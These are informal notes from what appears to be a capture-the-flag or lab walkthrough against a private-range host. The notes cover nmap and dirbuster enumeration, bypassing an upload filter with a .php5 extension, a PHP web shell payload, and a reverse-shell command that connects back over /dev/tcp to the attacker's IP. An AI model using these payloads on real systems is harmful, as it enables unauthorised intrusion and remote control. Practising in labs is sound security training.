 nmap scan - nmap 10.10.227.63 
*RESULT*
22/tcp open ssh
80/tcp open http
ports open 20/80
*VERSION OF APACHE2*
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
 - dirbuster 
/panel parent directory
/uploads/ to upload in order to get reverse shell 
i tried pentesting moneky php testing in order to change the php to php 4 5 6 etc...
5 worked for me i uploaded the php5 file consisting of #<?php system[$_GET['c']]; ?># code
http://10.10.227.63/uploads/phpreverse.php5?c=ls in the url 
in order to move from the php interface to a bash format i will --->
10.10.227.63/uploads/phpreverse.php5?c= echo 'sh -i >& /dev/tcp/10.8.126.176/4444 0>&1' > revershell.sh
